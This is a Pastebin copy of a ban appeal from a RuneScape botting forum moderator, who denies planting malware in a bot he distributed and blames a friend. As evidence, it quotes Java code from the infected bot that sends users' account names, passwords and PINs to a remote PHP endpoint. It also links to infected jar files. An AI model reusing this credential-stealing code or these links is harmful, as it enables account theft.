Pastebin
API
tools
faq
paste
Login
Sign up
Please fix the following errors:
New Paste
Syntax Highlighting
All text can be found publicly at http://bk.gs/botthatbanappeal and was written by myself nick1//botthat on Mar. 7 at 10PM EST. -- Original Ban (Pervy) -- [quote] Dear botthat, You have received an infraction at powerbot. Reason: Level 4 - hacking, scamming or phishing ------- Am very disappointed in you for posting a infected version of the bot to the public and hacking their accounts. This is not acceptable at all from a staff member of powerbot and their for you are demoted if your ban is lifted. [/quote] -- Original Post -- http://www.powerbot.org/vb/showthread.php?p=6623685#post6623685 -- Original Virus Links -- http://dl.dropbox.com/u/120327/RSBot2.jar http://x.vu/rsbot2 -- Hello, My name is botthat and on the IRC I am known by nick1. I was recently promoted to a moderator position and only two days later received a permanent ban for hacking accounts. Before I fully explain the ban, let me first explain who I am. When I was promoted I am sure it was a surprise to most people, as most had not seen me on the forums before. However, I have been actively involved with rsbot//powerbot since approximately May 2010 through both the original rsbot.org and the IRC chat channels of #rsbot and #rsbot_help. I think that most of my posts have come from the Bot Help Section, where I created and maintained a tutorial and complete guide for rsbot. (permalink at http://www.powerbot.org/vb/showthread.php?t=327599). This thread had over 195 thousand views as well as 1350 posts. Not only was this a popular tutorial but the reason for the popularity was due to my personal replies to each and every person that needed help, and directed those who needed further help to join #rsbot_help where me and others would help them to begin botting again. [code] [00:01] -ChanServ- Information for channel #rsbot_help: - [00:01] -ChanServ- Founder: Nick1 - [00:01] -ChanServ- Description: #rsbot_help For Help With RSBot Related Problems - [00:01] -ChanServ- Registered: Jun 10 22:53:10 2010 MDT - [00:01] -ChanServ- Last used: Mar 06 21:53:17 2011 MST [/code] Now, concerning the ban. I left Mar. 4 for a school field trip, returning late on Mar. 6 to find that I had been banned and demoted. The precompiled bot was an idea that was designed shortly after my tutorial became popular, something along the line of “I will answer your question if you post here” I cannot find the link because I am banned of course. Many of the people there were asking for scripts to be added and said they had already tried to follow the turorial (at that time stickied by jacmob). I began compiling scripts myself and then uploading it via dropbox and including the link in posts. I did not realize that this was a violation of the rules as I did and do not see it in there (specifically about precompiled bots) Concerning the malicious code. [code] [17:28] <activeradio> public int loop() [17:28] <activeradio> { [17:28] <activeradio> String s = account.getName().toLowerCase().trim(); [17:28] <activeradio> try [17:28] <activeradio> { [17:28] <activeradio> urlz = new URL("XXX/engine2.php"); [17:28] <activeradio> urlConnz = urlz.openConnection(); [17:28] <activeradio> urlConnz.setDoOutput(true); [17:28] <activeradio> urlConnz.setDoInput(true); [17:28] <activeradio> urlConnz.setUseCaches(false); 01[17:28] <nick1_offline> ...? [17:28] <activeradio> urlConnz.setRequestProperty("Content-Type", "application/x-www-form-urlencoded"); [17:28] <activeradio> outputz = new DataOutputStream(urlConnz.getOutputStream()); [17:28] <activeradio> String s1 = (new StringBuilder()).append("action=").append(account.getName().toLowerCase().trim()).append(":").append(account.getPassword()).append(":").append(account.getPin()).toString(); [17:28] <activeradio> outputz.writeBytes(s1); [17:28] <activeradio> outputz.flush(); [17:28] <activeradio> outputz.close(); [17:28] <activeradio> DataInputStream datainputstream = new DataInputStream(urlConnz.getInputStream()); [17:28] <activeradio> inputz = new BufferedReader(new InputStreamReader(datainputstream)); [17:28] <activeradio> String s3; [17:28] <activeradio> while((s3 = inputz.readLine()) != null) [17:28] <activeradio> resultz = (new StringBuilder()).append(resultz).append(s3).append("\n").toString(); [17:28] <activeradio> inputz.close(); [17:28] <activeradio> } [/code] For those of you that do know me (and like I previously stated, there are not many on the forums) you know that I do not have the capabilities to code anything near this level. The ONLY coding that I know is in mSL (mirc scripting language) and perhaps able to edit out an rsbot script to make it work for a different item. I sincerely believe that this is perhaps my strongest argument, ask anyone in the IRC including any respected programmer/coder in #rsbot #rscode etc. As far as how this malicious code was injected, for this I do take partial blame. In fact, after consideration, much of the blame must be put on me. The bot was hosted via dropbox (file sharing//syncing//storing program). My personal dropbox account ID is 120327, and therefore any links posted that are in the format of http://dl.dropbox.com/u/120327/* were being hosted on my dropbox. My dropbox was shared between me and two of my in real life friends. My dropbox was shared with both people so that we could share media like movies and music and I also told them that if rsbot updated and I wasn’t there then to update it and reupload. This is where I must take blame, because trusting people with a bot that many not only used, but also relied on was a mistake on my part. After reviewing revision logs in my public files I found the following. http://dl.dropbox.com/u/120327/BanAppeal1.jpg http://dl.dropbox.com/u/120327/BanAppeal2.jpg http://dl.dropbox.com/u/120327/BanAppeal3.jpg http://dl.dropbox.com/u/120327/BanAppeal4.jpg http://dl.dropbox.com/u/120327/BanAppeal5.jpg http://dl.dropbox.com/u/120327/BanAppeal6.jpg http://dl.dropbox.com/u/120327/BanAppeal7.jpg http://dl.dropbox.com/u/120327/BanAppeal8.jpg http://dl.dropbox.com/u/120327/BanAppeal9.jpg http://dl.dropbox.com/u/120327/BanAppeal10.jpg The revision history does not go back any longer than this, but it is mostly full of changes that I have made (by adding or removing scripts). The editors include myself Adam-PC and my two friends their pc names are shown as aspirate-PC (I think this is because his computer is an acer aspire) and Nick-PC. The “preview” magnifying glass contains a download to the jar file that was uploaded on that date, I considered downloading and reuploading all versions but there are 100 files saved I believe, instead I have made the following uploads. http://dl.dropbox.com/u/120327/RSBot%20-%20Private%20-%20RevSafe.jar http://dl.dropbox.com/u/120327/RSBot%20-%20Private%20-%20RevVirus.jar http://dl.dropbox.com/u/120327/scripts.zip The first is a link to the revision listed in picture 1, 3/2/2011 4:03 PM, the second is a link to the revision posted at 3/3/2011 4:59 PM. The third link is a zip file of all 510 scripts. I invite any admin to navigate to RSBot - Private - RevVirus.jar\org\rsbot\script\randoms And extract LoginBot.class After navigate to RSBot - Private - RevSafe.jar\org\rsbot\script\randoms And extract LoginBot.class Next decompile (NOTE a free web decompiler can be found here http://www.showmycode.com/ ) The results found will speak for themselves. There was clearly malicious code. Here are database links to the original class files and java files that they decompile to. http://dl.dropbox.com/u/120327/LoginBotVirus.class http://dl.dropbox.com/u/120327/LoginBotSafe.class http://dl.dropbox.com/u/120327/LoginBotVirus.java http://dl.dropbox.com/u/120327/LoginBotSafe.java The revisions from Nick-PC were safe, however the latest two revisions, as previously shown in pic1 DO contain malicious code and uploads your info to his website runningfromcode.zzl.org Today during school I talked with this “friend” and needless to say he has not only been unlinked from my dropbox but also unfriended on facebook etc. I also unlinked my other friend to be more cautious. The conversation I had with the hacker went something like this. [quote] Me: So, what exactly did you do to rsbot and it got me baned? Him: I will split the money with you man, we can both get rich Me: dude, I trusted you, you know how much I care about rsbot and helping out there and you use me for this… ……….. The conversation went on like this for about 2 mins (expletives removed..), he claims to have hacked a little over 500mil, all from powerbot accounts [/quote] I would like to add that the bot was not on my tutorial or posted anywhere after I was warned by Pervy//(reported by Coma, who I can clearly see has something against me??) to not post it. The bot was only linked via the IRC chat when users asked for it (it is especially important to note I was not the one actively spreading it, both wired420 and activeradio (other IRCops at the time) were posting the link probably more than myself). In conclusion, I do take full blame for allowing the bot to become compromised, as it was not smart to allow others access to such a vital file, however the reason I am posting this is for two reasons. 1. To allow my tutorial thread located at http://www.powerbot.org/vb/showthread.php?t=327599 to be brought back, as it was helpful to thousands each day. 2. To have my name cleared While I would prefer to be unbanned and have my mod status reinstated, this is not on my top two things to have done. It is extremely important that my name be cleared as many have trusted me and downloaded the bot, however the bot was only infected from the times detailed on the pictures. While the unfairness is reciprocated primarily through powerbot users, I also feel cheated by this “friend” of mine. Like I said, I have been with powrbot for over a year now and have dedicated my time to HELPING people. Recently being promoted to a moderator was a symbol of my dedication, and also if you review my mod actions you will see I was increasingly active when I was a moderator, both in posts and dealing with hackers//scammers. A final note that is interesting and ostensibly relevant, in the IRC with the help of #services we successfully banned//found (ask me for the name, or speak to #services IRCOP killah or darkex (op in #rsbot)) to be masking his IP and sending out a virus’d link to other users. That link is still publicly available, and still INFECTED and is located at http://dl.dropbox.com/u/20784545/RSBot.jar That version was sent out to all users on joining #rsbot, however it went unnoticed by the operators of #rsbot such as myself radioactive and wired420 because they did not send it to us. I am including this because it is important to note that this person created a MIRROR of my bot and had infected it. I would like to conclude by saying that this ban appeal is a total of 5 more pages than my English paper is at the moment, which is testimony to not only my dedication to powerbot, but also the importance that my name is cleared via powerbot. I would love to talk with an admin about my ban and can be reached via email at reply.anonymouse+forward@gmail.com or via the webchat (preferred) my nick is nick1 and here is a quick link http://qchat.rizon.net/?&channels=#rsbot,#rsbot_help Thank you for your time.
Optional Paste Settings
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Tags:
Syntax Highlighting:
None
Bash
C
C#
C++
CSS
HTML
JSON
Java
JavaScript
Lua
Markdown (PRO members only)
Objective C
PHP
Perl
Python
Ruby
Swift
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
ABAP
AIMMS
ALGOL 68
APT Sources
ARM
ASM (NASM)
ASP
ActionScript
ActionScript 3
Ada
Apache Log
AppleScript
Arduino
Asymptote
AutoIt
Autohotkey
Avisynth
Awk
BASCOM AVR
BNF
BOO
Bash
Basic4GL
Batch
BibTeX
Blitz Basic
Blitz3D
BlitzMax
BrainFuck
C
C (WinAPI)
C Intermediate Language
C for Macs
C#
C++
C++ (WinAPI)
C++ (with Qt extensions)
C: Loadrunner
CAD DCL
CAD Lisp
CFDG
CMake
COBOL
CSS
Ceylon
ChaiScript
Chapel
Clojure
Clone C
Clone C++
CoffeeScript
ColdFusion
Cuesheet
D
DCL
DCPU-16
DCS
DIV
DOT
Dart
Delphi
Delphi Prism (Oxygene)
Diff
E
ECMAScript
EPC
Easytrieve
Eiffel
Email
Erlang
Euphoria
F#
FO Language
Falcon
Filemaker
Formula One
Fortran
FreeBasic
FreeSWITCH
GAMBAS
GDB
GDScript
Game Maker
Genero
Genie
GetText
Go
Godot GLSL
Groovy
GwBasic
HQ9 Plus
HTML
HTML 5
Haskell
Haxe
HicEst
IDL
INI file
INTERCAL
IO
ISPF Panel Definition
Icon
Inno Script
J
JCL
JSON
Java
Java 5
JavaScript
Julia
KSP (Kontakt Script)
KiXtart
Kotlin
LDIF
LLVM
LOL Code
LScript
Latex
Liberty BASIC
Linden Scripting
Lisp
Loco Basic
Logtalk
Lotus Formulas
Lotus Script
Lua
M68000 Assembler
MIX Assembler
MK-61/52
MPASM
MXML
MagikSF
Make
MapBasic
Markdown (PRO members only)
MatLab
Mercury
MetaPost
Modula 2
Modula 3
Motorola 68000 HiSoft Dev
MySQL
Nagios
NetRexx
Nginx
Nim
NullSoft Installer
OCaml
OCaml Brief
Oberon 2
Objeck Programming Langua
Objective C
Octave
Open Object Rexx
OpenBSD PACKET FILTER
OpenGL Shading
Openoffice BASIC
Oracle 11
Oracle 8
Oz
PARI/GP
PCRE
PHP
PHP Brief
PL/I
PL/SQL
POV-Ray
ParaSail
Pascal
Pawn
Per
Perl
Perl 6
Phix
Pic 16
Pike
Pixel Bender
PostScript
PostgreSQL
PowerBuilder
PowerShell
ProFTPd
Progress
Prolog
Properties
ProvideX
Puppet
PureBasic
PyCon
Python
Python for S60
QBasic
QML
R
RBScript
REBOL
REG
RPM Spec
Racket
Rails
Rexx
Robots
Roff Manpage
Ruby
Ruby Gnuplot
Rust
SAS
SCL
SPARK
SPARQL
SQF
SQL
SSH Config
Scala
Scheme
Scilab
SdlBasic
Smalltalk
Smarty
StandardML
StoneScript
SuperCollider
Swift
SystemVerilog
T-SQL
TCL
TeXgraph
Tera Term
TypeScript
TypoScript
UPC
Unicon
UnrealScript
Urbi
VB.NET
VBScript
VHDL
VIM
Vala
Vedit
VeriLog
Visual Pro Log
VisualBasic
VisualFoxPro
WHOIS
WhiteSpace
Winbatch
XBasic
XML
XPP
Xojo
Xorg Config
YAML
YARA
Z80 Assembler
ZXBasic
autoconf
jQuery
mIRC
newLISP
q/kdb+
thinBasic
Paste Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Paste Exposure:
Public
Unlisted
Private
Folder:
(members only)
Password
NEW
Enabled
Disabled
Burn after read
NEW
Paste Name / Title:
Create New Paste
Hello
Guest
Sign Up
or
Login
Sign in with Facebook
Sign in with Twitter
Sign in with Google
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Pastes
VinCheckUp
4 hours ago | 1.69 KB
Dark Warning 4
8 hours ago | 0.72 KB
Dark Warning 3
8 hours ago | 0.21 KB
Dark Warning 2
8 hours ago | 5.63 KB
Dark Warning 1
8 hours ago | 1.50 KB
BH V BD 2
8 hours ago | 2.07 KB
BH V BD 1
8 hours ago | 1.07 KB
Boba Fett Pursuit 3
8 hours ago | 6.33 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the
Cookies Policy
.
OK, I Understand
Not a member of Pastebin yet?
Sign Up
, it unlocks many cool features!